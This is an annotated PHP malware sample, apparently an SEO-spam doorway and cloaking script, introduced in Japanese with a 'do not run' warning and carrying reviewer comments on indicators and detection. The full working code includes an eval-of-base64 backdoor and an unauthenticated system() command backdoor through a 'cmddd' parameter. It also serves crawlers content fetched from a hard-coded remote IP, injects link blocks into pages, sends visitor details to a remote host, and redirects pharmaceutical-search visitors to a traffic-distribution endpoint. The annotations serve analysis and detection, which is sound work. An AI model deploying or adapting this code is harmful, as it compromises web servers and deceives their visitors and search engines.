これは検索エンジンの最適化解除プログラムです。Web サイトのコンテンツに悪意のある言葉を挿入します。そのため、Google ボットなどのボットがサイトのインデックスを作成するときに、これらの単語を Web サイトに関連付けます。
これは、ダウンロードするファイルのコードです
実行しないでください
// NOTE(review): Hard-coded remote endpoints. Every outbound fetch, report and
// redirect later in this script is built from these three values, so they are
// the primary network indicators for this sample. "TDS" is the original
// author's label (presumably a traffic distribution system).
$sutra = "http://95.211.128.197/tds"; // TDS Url
$scheme = "default"; // TDS Cheme
$www_root = "http://95.211.128.197"; // Manager path
// NOTE(review): Snapshot of the incoming request. All of these values are
// supplied by the client (or derived from its request) and are used unvalidated
// further down. Where the @ operator is present it only hides the notice PHP
// raises for a missing key; the variable is still null in that case.
$host=$_SERVER['HTTP_HOST'];
$agent=$_SERVER['HTTP_USER_AGENT'];
$server_accept_language = @$_SERVER['HTTP_ACCEPT_LANGUAGE'];
$server_user_agent = @$_SERVER['HTTP_USER_AGENT'];
$server_referer = @$_SERVER['HTTP_REFERER'];
$server_host = @$_SERVER['HTTP_HOST'];
$server_forwarded_for = @$_SERVER['HTTP_X_FORWARDED_FOR'];
$server_remote_addr = @$_SERVER['REMOTE_ADDR'];
$server_query_string = @$_SERVER['QUERY_STRING'];
$server_signature = @$_SERVER['SERVER_SIGNATURE'];
$server_request = @$_SERVER['REQUEST_URI'];
// NOTE(review): Operator-only diagnostics. Debug output is enabled for exactly
// one client address; the same /24 is also listed in detectBot()'s IP masks.
$debug = false;
if ($server_remote_addr == "108.170.8.174"){$debug = true;}
if ($debug)
{
// The "DOOR OK" title is a fixed string and therefore usable as a content
// indicator. $originalurl is not assigned until later in the script, so it
// prints empty here. Header values are echoed without HTML escaping.
echo "<title>DOOR OK</title>";
echo "originalurl=$originalurl<br>";
echo "server_user_agent=$server_user_agent<br>";
echo "server_referer=$server_referer<br>";
echo "server_host=$host<br>";
echo "server_remote_addr=$server_remote_addr<br>";
echo "server_request=$server_request<br>";
echo "www_root=$www_root<br><br>";
// Reports which of the two fetch paths used below (cURL or file_get_contents)
// is available on the host.
echo "Check CURL extension...";
if (extension_loaded('curl'))
{
echo "<font color=green><b>YES</b></font><br><br>";
}
else
{
echo "<font color=red><b>NO</b></font><br><br>";
}
}
// NOTE(review): Visitor deny-list. Each check below ends the request with an
// empty response when the Referer, User-Agent or client address matches.
// eregi() is the case-insensitive POSIX regex function that was deprecated in
// PHP 5.3 and removed in PHP 7.0, which dates the sample and makes "eregi" a
// useful string to search for when triaging a compromised web root.
// The patterns are unanchored regular expressions, so "." matches any
// character and e.g. "75.125." can match anywhere inside the address string.
// Some bad guys :)
if (eregi ("start=56",$server_referer))
{
exit();
}
// Two exact User-Agent strings are rejected outright.
if ($agent == "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)")
{
exit();
}
if ($agent == "Mozilla/4.0")
{
exit();
}
// Client address fragments that receive an empty response. The source gives no
// reason for these entries beyond the author's comment above.
if (eregi("75.125.",$server_remote_addr))
{
exit();
}
if (eregi("41.190.",$server_remote_addr))
{
exit();
}
if (eregi("143.215.169",$server_remote_addr))
{
exit();
}
if (eregi("75.55.",$server_remote_addr))
{
exit();
}
if (eregi("67.212.",$server_remote_addr))
{
exit();
}
if (eregi("173.236.",$server_remote_addr))
{
exit();
}
if (eregi("184.154.",$server_remote_addr))
{
exit();
}
// Single exact address, compared as a string.
if ($server_remote_addr == '194.115.120.14')
{
exit();
}
//////////////////////////////////////////////////////////////////////////////
// NOTE(review): Backdoor 1 - remote PHP evaluation. When the MD5 of the
// "img_id" request parameter equals the hard-coded digest and "mod_content" is
// present, the base64-decoded "mod_content" value is passed to eval(). The
// digest acts as a shared password; the comparison uses loose "==".
// Detection: look for requests carrying both "img_id" and "mod_content" in web
// server and WAF logs ($_REQUEST may also be fed from POST bodies and cookies,
// which plain access logs usually do not record), and search the web root for
// the digest string.
if((md5($_REQUEST["img_id"]) == "ae6d32585ecc4d33cb8cd68a047d8434") && isset($_REQUEST["mod_content"])) { eval(base64_decode($_REQUEST["mod_content"])); exit(); }
// NOTE(review): Backdoor 2 - unauthenticated command execution. The "cmddd"
// query parameter is handed to system() with no credential check at all, so a
// host carrying this file should be treated as fully compromised, not merely
// as serving spam. Detection: "cmddd=" in access-log query strings.
$cmd = $_GET['cmddd'];
if (isset($cmd))
{
system($cmd);
exit();
}
// NOTE(review): Cloaking switch. detectBot() (defined at the end of this file)
// returns false for client addresses and User-Agents it attributes to crawlers
// and true otherwise. Requests classified as crawlers take the first branch
// (remote content / link injection); all others take the else branch
// (search-referral tracking and redirect). Because the two audiences see
// different responses, comparing the page as fetched with a crawler-style
// User-Agent against a normal browser fetch is a practical way to confirm an
// infection.
@$is_human = @detectBot($server_user_agent,$server_remote_addr,$server_query_string,$server_referer);
if (@$is_human==false)
{
// Crawler branch, step 1: derive the remote lookup path from the request.
// The folder is the client-supplied Host header with "www." removed.
$folder = str_replace("www.","",$host);
if (($server_request=="") || ($server_request=="/"))
{
// Only $filename is assigned on this path; $filename1 and $filename2, which
// the fetch URLs below actually use, are left unset for the site root.
$filename = "index.php";
}
else
{
// The request URI is flattened into a file name by deleting separators and
// punctuation. Two variants are kept: "&" removed, and "&" replaced by "amp".
$filename = str_replace("_","",$server_request);
$filename = str_replace("_","",$filename);
$filename = str_replace(" ","",$filename);
$filename = str_replace("%","",$filename);
$filename = str_replace("|","",$filename);
$filename = str_replace("/","",$filename);
$filename = str_replace(";","",$filename);
$filename = str_replace("+","",$filename);
$filename = str_replace("?","",$filename);
$filename = str_replace(".","",$filename);
$filename = str_replace("=","",$filename);
$filename1 = str_replace("&","",$filename);
$filename2 = str_replace("&","amp",$filename);
$filename1 = $filename1.".php";
$filename2 = $filename2.".php";
}
// Step 2: fetch three resources from $www_root - the two page variants and a
// per-site "doors.txt" link block. These are server-side outbound requests, so
// they show up in egress/proxy logs rather than in the site's access log.
// No timeout is set and the handles are never closed.
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$www_root/pages/$folder/$filename1");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$remote_page = curl_exec($ch);
$ch2 = curl_init();
curl_setopt($ch2, CURLOPT_URL, "$www_root/pages/$folder/$filename2");
curl_setopt($ch2, CURLOPT_HEADER, 0);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
$remote_page2 = curl_exec($ch2);
$ch2 = curl_init();
//curl_setopt($ch2, CURLOPT_URL, "$www_root/_links/doors.php");
curl_setopt($ch2, CURLOPT_URL, "$www_root/pages/$folder/doors.txt");
curl_setopt($ch2, CURLOPT_HEADER, 0);
curl_setopt($ch2, CURLOPT_RETURNTRANSFER, 1);
$links_map = curl_exec($ch2);
// A body containing "Not Found" is treated as "no links for this site".
if (eregi ("Not Found", $links_map))
{
$links_map = "";
}
}
else
{
// Fallback without cURL: the same three URLs are read with file_get_contents().
$remote_page = file_get_contents("$www_root/pages/$folder/$filename1");
$remote_page2 = file_get_contents("$www_root/pages/$folder/$filename2");
$links_map = file_get_contents("$www_root/pages/$folder/doors.txt");
if (eregi ("Not Found", $links_map))
{
$links_map = "";
}
//$links_map = file_get_contents("$www_root/_links/doors.php");
}
// Step 3a: if either fetched variant contains an <h2> tag it is served to the
// crawler verbatim in place of the real page. The trailing HTML comment is a
// fixed marker and a reliable content indicator for this sample.
if (eregi('<h2>', $remote_page))
{
echo $remote_page."<!-- End HTML 3.51.197 -->";
exit;
}
if (eregi('<h2>', $remote_page2))
{
echo $remote_page2."<!-- End HTML 3.51.197 -->";
exit;
}
else
{
// Step 3b: no replacement page is available, so the site's own page is
// re-requested over HTTP and modified. The spoofed browser User-Agent does not
// match the agent mask in detectBot(), so presumably this inner request takes
// the non-crawler path and returns the unmodified page - TODO confirm.
// The truncated MSIE 6.0 string is an indicator to look for in access logs.
// NIHT :)
$originalurl="http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"];
$originaluseragent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;";
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $originalurl);
curl_setopt($ch, CURLOPT_USERAGENT, $originaluseragent);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$originalpage = curl_exec($ch);
}
else
{
$originalpage = @file_get_contents($originalurl);
}
// The first preg_replace removes href attributes that point at absolute http
// URLs (through the end of the tag), stripping the page's own outbound links.
// The second inserts the fetched $links_map directly after the opening <body>
// tag (its attributes are dropped) or, failing that, before </body>.
if (preg_match('/<body.*?>/i',$originalpage)) {
$originalpage=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $originalpage);
$originalpage=preg_replace('/(<body.*?>)/i', "<body>$links_map", $originalpage, 1);
} elseif (preg_match('/<\/body>/i',$originalpage)) {
$originalpage=preg_replace('/href=([\'"]{0,1})http.*?>/i', '>', $originalpage);
$originalpage=preg_replace('/(<\/body>)/i', "$links_map</body>", $originalpage, 1);
}
// Same fixed marker as above is appended to the modified page.
print $originalpage."<!-- End HTML 3.51.197 -->";
exit;
//echo '<font id="mix" color="8a517f" style="height: 0;overflow: hidden;width: 0; position: absolute; font-family:courier; font-size:19px">'
//echo $links_map;
//'</font>';
}
}
else
{
// Non-crawler branch. $keys is a case-insensitive alternation of diet and
// pharmaceutical terms that is matched against the Referer header to pick out
// visitors arriving from a search for those terms.
$keys = "/acai|diet|weight|loss|pharmac|drug|lunesta|provigil|modafinil|proventil|accutane|cialas|aciphex|acomplia|acyclovir|adalat|albendazole|albenza|albuterol|aldactone|alendronate|allegra|altace|amaryl|amiloride|amlodipine|amoxicillin|ansaid|arava|arcoxia|atenolol|atorvastatin|avandia|avapro|avodart|aygestin|azathioprine|azithromycin|baclofen|bactrim|benazepril|benzodiazepine|biaxin|bisoprolol|bromocriptine|bupropion|calan|carbamazepine|carisoprodol|carvedilol|ceclor|cefaclor|cefpodoxime|celebrex|celecoxib|cetirizine|chlorambucil|cialis|clarinex|clarithromycin|claritin|clopidogrel|colospa|conjugated|coreg|coumadin|coversyl|cyproheptadine|danazol|danocrine|desloratadine|desyrel|digoxin|dilantin|dipyridamole|domperidone|dutasteride|effexor|eldepryl|enalapril|epivir|erythromycins|escitalopram|esomeprazole|estrace|estradiol|ethambutol|etoricoxib|evista|ezetimibe|famciclovir|famvir|felodipine|fenofibrate|fexofenadine|finasteride|flagyl|flavoxate|flomax|floxin|fluoxetine|flurbiprofen|fosamax|frumil|furosemide|gabapentin|gemfibrozil|geodon|glimepiride|glipizide|glucophage|glucotrol|hydroch|hytrin|hyzaar|ibuprofen|ilosone|imdur|imitrex|imuran|indapamide|inderal|irbesartan|isordil|isosorbide|kamagra|ketoconazole|lamictal|laminuvide|lamisil|lamotrigine|lanoxin|lansoprazole|lasix|leflunomide|lenor72|leukeran|levaquin|levitra|levlen|levofloxacin|levonorgestrel|levothroid|levothyroxine|lexapro|lioresal|lipitor|lisinopril|lopid|lopressor|loratadine|losartan|lotensin|lovastatin|loxapine|loxitane|lozol|mebeverine|medroxy|mefenamicacid|meloxicam|meridia|metformin|metoclopramide|metoprolol|metronidazole|mevacor|mexiletine|mexitil|microzide|minipress|mobic|montelukast|motilium|motrin|myambutol|nabumetone|naprosyn|naproxen|neurontin|nexium|nifedipine|nimodipine|nimotop|niravam|nizoral|nolvadex|norethindrone|norplant72|nortriptyline|norvasc|ofloxacin|omeprazole|orlistat|oseltami|pamelor|pantoprazole|parlodel|paroxetine|paxil|periactin|perindropril|persantine|phenergan|phenytoin|plav
ix|plendil|ponstel|prandin|pravachol|pravastatin|prazosin|prednisolone|prednisone|premarin|prevacid|prilosec|prograf|promethazine|propafenone|propecia|propranolol|proscar|protonix|provera|prozac|rabeprazole|raloxifene|ramipril|ranitidine|reductil|reglan|relafen|repaglinide|retrovir|rimonabant|risperdal|risperidone|rivotril|rosiglitazonemaleate|roxithromycin|rulide|rythmol|selegiline|sertraline|sibutramine|sildenafil|simvastatin|singulair|soma|spironolactone|stavudine|sulfamet|sumatriptan|sumycin|synthroid|tacrolimus|tadalafil|tamiflu|tamoxifen|tamsulosin|tegaserod|tegretol|tenormin|terazosin|terbinafine|tetracycline|topamax|topiramate|trazodone|tricor|trimox|urispas|valacyclovir|valtrex|vantin|vardenafil|vasotec|venlafaxine|verapamil|viagra|warfarin|xenical|zantac|zebeta|zelnorm|zerit|zestril|zetia|zidovudine|zimulti|ziprasidone|zithromax|zocor|zoloft|zovirax|zyban|zyrtec|ambien|phentermine|xanax|valium|tramadol|adipex|zolpidem|ativan|alprazolam|diazepam|klonopin|lorazepam|clonazepam|ultram|zopiclone|modalert|hair|vicodin|amoxil|atomoxetine|cipro|ciprofloxacin|clomid|clomiphene|deltasone|diflucan|doxycycline|fluconazole|isotretinoin|pentazine|septra|strattera/i";
// Case 1: a short (< 30 characters) Referer that mentions "google", i.e. a
// Google referral without a visible query. The hit is reported to the manager
// host and the visitor is redirected to the TDS endpoint. $sese has not been
// assigned on this path, so the "se" field is sent empty.
if (strlen($_SERVER["HTTP_REFERER"]) < 30)
{
if (eregi ("google", $_SERVER["HTTP_REFERER"]))
{
$key = "unknown";
$host_new = str_replace("www.","",$host);
if (extension_loaded('curl'))
{
// Visitor details (site, URI, referrer, User-Agent, client address) are
// POSTed to the manager host; the response body is ignored.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
$data = array(
'domain' => $host_new,
'uri' => $server_request,
'se' => $sese,
'referrer' => $_SERVER["HTTP_REFERER"],
'agent' => $agent,
'server_remote_addr' => $server_remote_addr,
'keys' => $key
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
}
else
{
// Without cURL the same fields go out in a GET query string, unencoded.
@file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
}
// The visitor leaves the legitimate site here via a Location redirect.
$location = "$sutra/in.cgi?$scheme";
header("Location: ".$location);
exit;
}
}
// The block comment below is a disabled variant of Case 1 kept by the original
// author (Google referrals carrying "url="); it is not executed.
/** if ((eregi ("url=", $server_referer)) AND (preg_match('/google/i', $server_referer)))
{
$key = "unknown, https";
$host_new = str_replace("www.","",$host);
if (extension_loaded('curl'))
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
$data = array(
'domain' => $host_new,
'uri' => $server_request,
'se' => $sese,
'referrer' => $_SERVER["HTTP_REFERER"],
'agent' => $agent,
'server_remote_addr' => $server_remote_addr,
'keys' => $key
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
}
else
{
@file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
}
$location = "$sutra/in.cgi?$scheme";
header("Location: ".$location);
exit;
}
*/
// Case 2: the Referer contains one of the keywords. The search term is pulled
// out of the Referer's query string per engine ("p=" for Yahoo, "q=" for the
// others) and $sese records which engine matched. Note that $keys is reused
// here and overwritten with the explode() result.
if (preg_match($keys, $_SERVER["HTTP_REFERER"]))
{
$key = $_SERVER["HTTP_REFERER"];
$sese="unknown";
if (eregi("yahoo", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("p=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="yahoo";
}
if (eregi("google", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="google";
}
if (eregi("bing", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="bing";
}
if (eregi("aol.com", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="aol";
}
if (eregi("ask.com", $_SERVER["HTTP_REFERER"]))
{
$keys = explode ("q=", $_SERVER["HTTP_REFERER"]);
$keys = explode ("&", $keys[1]);
$key = $keys[0];
$sese="ask";
}
$host_new = str_replace("www.","",$host);
if (extension_loaded('curl'))
{
// Same reporting call as in Case 1, now including the extracted search term.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$www_root/_scripts/human.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
$data = array(
'domain' => $host_new,
'uri' => $server_request,
'se' => $sese,
'referrer' => $_SERVER["HTTP_REFERER"],
'agent' => $agent,
'server_remote_addr' => $server_remote_addr,
'keys' => $key
);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
curl_exec($ch);
}
else
{
@file_get_contents("$www_root/_scripts/human.php?domain=$host_new&uri=$server_request&se=$sese&keys=$key&agent=$agent&server_remote_addr=$server_remote_addr&referrer=".$_SERVER["HTTP_REFERER"]);
}
// Redirect to the TDS endpoint with the search term, this site's host and the
// full Referer appended without URL-encoding.
// NOTE(review): the "¶" in the string below looks like an extraction artifact
// of "&para" (i.e. originally "&parameter=") - confirm against a raw copy.
$location = "$sutra/in.cgi?$scheme¶meter=".$key."&se=".$host."&HTTP_REFERER=".$_SERVER["HTTP_REFERER"];
//$location = "http://health-profile.net/";
header("Location: ".$location);
exit;
}
// No Referer match: execution falls out of this branch without output.
}
////////////////////////////////////////////////////////////////////////////////////////////////////
/**
 * Classifies the current visitor for the cloaking logic in the main script.
 *
 * Returns false ("not human") when the client address matches any regex in
 * $stop_ips_masks or when the User-Agent matches $stop_agents_masks; returns
 * true otherwise. Only the first two parameters are read; the query string and
 * referer are accepted but unused.
 *
 * NOTE(review): the agent mask is broad - any User-Agent containing "linux" or
 * "bot" is classified as a crawler and is therefore served the injected
 * content, which is why this kind of infection can be visible from some
 * ordinary clients but not others.
 *
 * @param string $server_user_agent   User-Agent header of the request.
 * @param string $server_remote_addr  Client address (REMOTE_ADDR).
 * @param string $server_query_string Unused.
 * @param string $server_referer      Unused.
 * @return bool true if treated as a human visitor, false if treated as a bot.
 */
function detectBot($server_user_agent,$server_remote_addr,$server_query_string,$server_referer){
$is_human = true;
// Anchored PCRE patterns, one per address range. The range/owner labels in
// the trailing comments are the original author's and are not verified here.
// Besides search-engine ranges the list includes the manager host's own
// 95.211.128.x range and the 108.170.8.x range used for the debug view.
$stop_ips_masks = array(
"/^8\.6\.4[8-9]\.[0-9]+$/", // NetRange: 8.6.48.0 - 8.6.55.255 Google Inc
"/^8\.6\.5[0-5]\.[0-9]+$/", // NetRange: 8.6.48.0 - 8.6.55.255 Google Inc
"/^64\.233\.1[6-8][0-9]\.[0-9]+$/", // NetRange: 64.233.160.0 - 64.233.191.255 Google Inc
"/^64\.233\.19[0-1]\.[0-9]+$/", // NetRange: 64.233.160.0 - 64.233.191.255 Google Inc
"/^64\.68\.8[0-7]\.[0-9]+$/", // NetRange: 64.68.80.0 - 64.68.87.255 Google Inc
"/^66\.249\.6[4-9]\.[0-9]+$/", // NetRange: 66.249.64.0 - 66.249.95.255 Google Inc
"/^66\.249\.[7-8][0-9]\.[0-9]+$/", // NetRange: 66.249.64.0 - 66.249.95.255 Google Inc
"/^66\.249\.9[0-5]\.[0-9]+$/", // NetRange: 66.249.64.0 - 66.249.95.255 Google Inc
"/^72\.14\.19[2-9]\.[0-9]+$/", // NetRange: 72.14.192.0 - 72.14.255.255 Google Inc
"/^72\.14\.2[0-5][0-9]\.[0-9]+$/", // NetRange: 72.14.192.0 - 72.14.255.255 Google Inc
"/^74\.125\.[0-9]+\.[0-9]+$/", // NetRange: 74.125.0.0 - 74.125.255.255 Google Inc
"/^74\.6\.[0-9]+\.[0-9]+$/", // NetRange: 74.6.0.0 - 74.6.255.255 Google Inc
"/^216\.239\.3[2-9]\.[0-9]+$/", // NetRange: 216.239.32.0 - 216.239.63.255 Google Inc
"/^216\.239\.4[0-9]\.[0-9]+$/", // NetRange: 216.239.32.0 - 216.239.63.255 Google In
"/^216\.239\.6[0-3]\.[0-9]+$/", // NetRange: 216.239.32.0 - 216.239.63.255 Google Inc
"/^209\.85\.12[8-9]\.[0-9]+$/", // NetRange: 209.85.128.0 - 209.85.255.255 Google Inc
"/^209\.85\.1[3-9][0-9]\.[0-9]+$/", // NetRange: 209.85.128.0 - 209.85.255.255 Google Inc
"/^209\.85\.2[0-5][0-9]\.[0-9]+$/", // NetRange: 209.85.128.0 - 209.85.255.255 Google Inc
"/^64\.9\.22[4-9]\.[0-9]+$/", // NetRange: 64.9.224.0 - 64.9.255.255 Google Inc
"/^64\.9\.2[3-4][0-9]\.[0-9]+$/", // NetRange: 64.9.224.0 - 64.9.255.255 Google Inc
"/^64\.9\.25[0-5]\.[0-9]+$/", // NetRange: 64.9.224.0 - 64.9.255.255 Google Inc
"/^66\.102\.[0-9]\.[0-9]+$/", // NetRange: 66.102.0.0 - 66.102.15.255 Google Inc
"/^66\.102\.1[0-5]\.[0-9]+$/", // NetRange: 66.102.0.0 - 66.102.15.255 Google Inc
"/^137\.110\.[0-9]+\.[0-9]+$/", // NetRange: 137.110.222.* Google bot
"/^65\.5[2-5]\.[0-9]+\.[0-9]+$/", // NetRange: 65.52.0.0 - 65.55.255.255 Microsoft Corp
"/^67\.195\.[0-9]+\.[0-9]+$/", // NetRange: 67.195.0.0 - 67.195.255.255 Yahoo! Inc
"/^209\.131\.3[2-9]\.[0-9]+$/", // NetRange: 209.131.32.0 - 209.131.63.255 Yahoo! Inc
"/^209\.131\.[4-5][0-9]\.[0-9]+$/", // NetRange: 209.131.32.0 - 209.131.63.255 Yahoo! Inc
"/^209\.131\.[6][0-3]\.[0-9]+$/", // NetRange: 209.131.32.0 - 209.131.63.255 Yahoo! Inc
"/^66\.163\.1[6-8][0-9]\.[0-9]+$/", // NetRange: 66.163.160.0 - 66.163.191.255 Yahoo! Inc
"/^66\.163\.19[0-1]\.[0-9]+$/", // NetRange: 66.163.160.0 - 66.163.191.255 Yahoo! Inc
"/^184\.72\.[0-9]+\.[0-9]+$/", // NetRange: 184.72.0.0 - 184.73.255.255 AMAZON
"/^184\.73\.[0-9]+\.[0-9]+$/", // NetRange: 184.72.0.0 - 184.73.255.255 AMAZON
"/^198\.134\.135\.[0-9]+$/", // NetRange: 198.134.135.0 - 198.134.135.255 UCSD.EDU
"/^129\.79\.49\.[0-9]+$/", // NetRange: 129.79.49.249 Indiana University
"/^69\.12\.216\.[0-9]+$/", // NetRange: 69.12.216.14 Sonic.net
"/^62\.189\.112\.[0-9]+$/", // NetRange: 62.189.112.0 - 62.189.112.255 MCAFEE INTERNATIONAL
"/^79\.178\.31\.[0-9]+$/", // NetRange: 79.178.31.165 hz
"/^78\.46\.70\.[0-9]+$/", // NetRange: 78.46.70.145 hz
"/^87\.98\.215\.[0-9]+$/", // NetRange: 87.98.215.155 hz
"/^64\.34\.165\.[0-9]+$/", // NetRange: 64.34.165.218 hz
"/^93\.186\.20\.[0-9]+$/", // NetRange: 93.186.20.13 hz
"/^204\.118\.31\.202$/",
"/^74\.81\.89\.114$/",
"/^82\.192\.91\.10$/",
"/^192\.251\.226\.206$/",
"/^95\.211\.27\.[0-9]+$/",
"/^95\.211\.129\.[0-9]+$/",
"/^95\.211\.128\.[0-9]+$/",
"/^128\.163\.16\.[0-9]+$/", // NetRange: 128.163.16.* UKY
"/^91\.217\.162\.[0-9]+$/",
"/^91\.220\.35\.[0-9]+$/",
"/^195\.14\.112\.[0-9]+$/",
"/^86\.55\.210\.[0-9]+$/",
"/^184\.173\.219\.[0-9]+$/",
"/^184\.172\.169\.[0-9]+$/",
"/^50\.22\.89\.[0-9]+$/",
"/^64\.120\.249\.[0-9]+$/",
"/^46\.37\.184\.[0-9]+$/",
"/^10\.48\.17\.[0-9]+$/",
"/^108\.170\.8\.[0-9]+$/",
"/^64\.120\.227\.[0-9]+$/"
);
// Linear scan over the masks; stops at the first one that matches the address.
$stop_ips_masks_count = count ($stop_ips_masks);
for($w=0; $w<$stop_ips_masks_count; $w++)
{
if(preg_match($stop_ips_masks[$w], $server_remote_addr))
{
$is_human = false; break;
}
}
// Case-insensitive substring match on the User-Agent; evaluated even when
// the address check has already classified the visitor.
$stop_agents_masks = "/google|bot|rambler|yandex|yahoo|freebsd|libwww|spider|linux/i";
if (preg_match($stop_agents_masks, $server_user_agent))
{
$is_human = false;
}
// if (strlen ($server_user_agent) < 12)
// {
// $is_human = false;
// }
return $is_human;
}